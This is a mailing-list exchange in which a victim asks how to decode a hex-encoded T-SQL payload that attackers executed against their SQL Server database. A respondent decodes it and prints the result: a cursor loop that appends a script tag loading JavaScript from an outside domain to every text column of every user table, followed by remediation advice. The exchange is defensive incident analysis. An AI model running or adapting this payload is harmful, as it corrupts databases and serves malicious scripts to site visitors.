Re: Urgent: Deciphering binary code executed against the database

anojjona@[EMAIL PROTECTED]
 wrote:

> Hi,
>   I need to figure out what some code that was maliciously executed
> against a database does.  However, it's in a very strange format.  It
> simply declares a variable and sets it equal to a huge binary thing
> (seems to be some sort of compiled code) cast as nvarchar.  It then
> executes this variable.
>    Is there any way to decipher or decompile this code?  Does anyone
> have information either on what SQL Server does when it's asked to
> execute a binary string (as opposed to regular T-SQL) and any tools
> that can be used to disassemble or understand this code?
>    Thanks!
> 
>    Here's the code:
> 
> DECLARE @[EMAIL PROTECTED]
 NVARCHAR(4000);
> SET
> @[EMAIL PROTECTED]
(0x44004

[...]

> EXEC(@[EMAIL PROTECTED]
);

Hi

Copy the code into a query window for a test datadase, then insted of
the EXEC(@[EMAIL PROTECTED]
) just simply do a

 SELECT @[EMAIL PROTECTED]
 look at the result. Here is what I got:

DECLARE @[EMAIL PROTECTED]
 varchar(255),@[EMAIL PROTECTED]
 varchar(255) 
DECLARE Table_Cursor CURSOR FOR select a.name,b.name 
  from sysobjects a,syscolumns b 
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) 
  
OPEN Table_Cursor 
  FETCH NEXT FROM  Table_Cursor INTO @[EMAIL PROTECTED]
 
  WHILE(@[EMAIL PROTECTED]
) 
    BEGIN 
      exec('update ['+@[EMAIL PROTECTED]
'] 
            set ['+@[EMAIL PROTECTED]
']=rtrim(convert(varchar,['+@[EMAIL PROTECTED]
']))+''
            <script src=http://www.killwow1.cn/g.js></script>''')
      FETCH NEXT FROM  Table_Cursor INTO @[EMAIL PROTECTED]
 
    END CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

I'm not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.

But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.

HTH
Matthias Kläy
-- 
www.kcc.ch